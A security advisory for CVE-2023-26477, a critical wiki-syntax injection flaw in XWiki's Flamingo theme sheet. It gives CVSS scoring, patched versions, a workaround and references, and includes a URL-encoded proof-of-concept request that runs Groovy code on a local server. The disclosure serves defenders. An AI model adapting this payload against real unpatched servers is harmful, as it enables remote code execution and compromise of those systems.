10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
0.003 Low
EPSS
Percentile
70.3%
It’s possible to inject arbitrary wiki syntax including Groovy, Python and Velocity script macros via the newThemeName
request parameter (URL parameter), in combination with additional parameters form_token=1&action=create
.
For instance: http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create will execute the following groovy code: println("hello from groovy!")
on the server.
This has been patched in the supported versions 13.10.10, 14.9-rc-1, and 14.4.6.
It is possible to edit FlamingoThemesCode.WebHomeSheet
and manually perform the changes from the patch fixing the issue.
If you have any questions or comments about this advisory:
github.com/advisories/GHSA-x2qm-r4wx-8gpg
github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284
github.com/xwiki/xwiki-platform/security/advisories/GHSA-x2qm-r4wx-8gpg
jira.xwiki.org/browse/XWIKI-19757
nvd.nist.gov/vuln/detail/CVE-2023-26477